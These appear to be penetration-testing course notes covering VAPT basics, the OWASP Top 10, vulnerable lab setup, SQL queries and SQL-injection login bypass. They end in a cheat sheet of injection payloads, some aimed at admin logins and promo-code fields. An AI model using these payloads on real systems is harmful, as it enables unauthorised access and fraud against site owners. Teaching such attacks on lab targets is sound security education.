- Session 9
- =========
- Introduction to VAPT
- ====================
- V --> Vulnerability
- weakness, loopholes --> access points through which an attacker can compromise your device or web application
- A --> Assessment
- To assess ---> To scan for the Vulnerability
- P --> Penetration
- To penetrate --> To gain access of the device
- T --> Testing
- To test for vulnerabilities and to generate the report
- VA and PT
- ---------
- Vulnerability Assessment
- We scan for loopholes and vulnerabilities, and make a report of them
- Penetration Testing
- We try to gain access via the above-mentioned vulnerabilities.
- OWASP
- =====
- Open Web Application Security Project
- It is a non-profit charitable organisation which works for the security and the welfare of web applications.
- OWASP came up with an initiative ---> CTF Initiative
- CTF --> Capture The Flag
- OWASP TOP 10 Attacks
- Injection
- XSS --> Cross Site Scripting
- CSRF --> Cross Site Request Forgery
- IDOR --> Insecure Direct Object References
- Sensitive Data Exposure
- Unvalidated Redirects and Forwards
- Missing Function Level Access Control
- Security Misconfiguration
- Using Components With Known Vulnerability
- Broken Authentication and Session Management
- https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf
- Simulated Environment ---> Which are by default vulnerable
- LVS --> Lucideus vulnerable Simulation
- DVWA --> Damn Vulnerable Web Application --> 1.8
- WAVE
- BEEWasp
- WebGoat
- Setup and Configure LVS
- =======================
- https://ufile.io/o4dwz --> Downloading Link For LVS
- Step 1 --> To extract the zip file
- Step 2 --> Copy the extracted ZIP file in C:\xampp\htdocs
- Step 3 --> Start the xampp server
- Step 4 --> Start apache and mysql services
- Step 5 --> start the browser and type --> 127.0.0.1/<lvs Folder name>
- DBMS
- ====
- Database Management System
- Database --> Collection of data --> It stores data in a tabular manner. In the form of rows and columns.
- tuples and attributes
- Database --> Tables --> Columns --> Rows(data)
- DBA --> Data Base Administrator
- SQL --> Structured Query Language
- =================================
- https://www.xyz.com/items.php?id=2
- ---> Product name, Product Price
- Select product_name,Product_price from items where id=2;
- Source ---> Delhi
- Destination --> Jalandhar
- Date --> 20/6/2018
- Class --> 1T
- select train_name from trains where source="Delhi" and Destination="Jalandhar" and date="20/6/2018" and class="1T";
- Queries
- =======
- 1. Insert
- Insert into <table_name>(Column_Name) VALUES(Values to be inserted);
- INSERT INTO `info`(`Name`, `Salary`, `Address`, `Gen`) VALUES ('Prashant', 10000, 'Roshan Garden Najafgarh', 'M');
- 2. Select
- Select * from <table_name>;
- Select * from info;
- 3. UPDATE
- Update <table_name> SET <value to change> where <condition>;
- UPDATE info SET Salary=30000 where Name="Abhijeet Singh";
- 4. Where
- It is a condition
- Select * from info where salary > 15000;
- Select * from info where name like "A%";
- 5. Delete
- DELETE from info WHERE Name="Abhijeet Singh";
- 6. AND
- SELECT * FROM `info` WHERE salary>=20000 and Gen='M';
- 7. Create
- Create table <table_name>(columns_name data_Type Length);
- CREATE table training(Name Text(20), Age int(3), Gender Text(1));
- 8. Order By
- It will arrange the data into either ascending order or in descending order
- SELECT * FROM `training` ORDER BY Name;
- 9. Group By
- To group the data
- SELECT * FROM `training` GROUP by Gender;
- 10. UNION
- SELECT name from info UNION select name from training;
- SELECT name,gen,salary,address from info UNION SELECT name,gender,age,null FROM training;
- 11. Information_schema -->Meta database
- SQL Injection
- =============
- Authentication Bypass
- ---------------------
- To bypass the authentication on a login form and gain access as the administrator.
- There are 4 types of authentication
- 1. Basic Authentication
- 2. Integrated Authentication
- 3. Digest Authentication
- 4. Form Based Authentication
- Logic Gates
- ===========
- AND Gate --> If any of the values is false, then the answer will be false
- 0 and 0 = 0
- 0 and 1 = 0
- 1 and 0 = 0
- 1 and 1 = 1
- OR --> If any of the value is true, then the answer will be true
- 0 or 0 = 0
- 0 or 1 = 1
- 1 or 0 = 1
- 1 or 1 = 1
- 1 ---> True ---> Administrator
- ' ---> Single inverted Comma ---> Use to break the SQL query
- www.abc.com/items.php?id=2
- www.abc.com/items.php?id=2' 1'or'1'='1 '
- 1'or'1'='1
- admin and 1'or'1'='1
- select '1'or'1'='1'
- Username --> 1'or'1'='1 always true
- Password --> 1'or'1'='1 always true
- Administrator Login
- x'or'x'='x ---> true
- Coupons | Promo Code ---> 1'or'1'='1
- Cheat sheet
- ===========
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- admin') or '1'='1'/*
- 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055